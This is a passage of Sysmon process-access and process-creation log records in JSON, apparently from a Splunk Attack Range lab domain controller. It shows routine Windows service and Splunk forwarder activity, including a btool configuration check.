ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nTargetProcessId: 2800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","TargetProcessId":"2800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2053,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.271\r\nSourceProcessGUID: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nSourceProcessId: 2800\r\nSourceThreadId: 4092\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.271","SourceProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","SourceProcessId":"2800","SourceThreadId":"4092","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2054,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.304\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-0010B0F00300}\r\nProcessId: 4080\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.304","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-0010B0F00300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2055,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010B0F00300}\r\nTargetProcessId: 4080\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010B0F00300}","TargetProcessId":"4080","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2056,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-0010B0F00300}\r\nTargetProcessId: 4080\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-0010B0F00300}","TargetProcessId":"4080","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2057,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.302","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2058,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.302\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 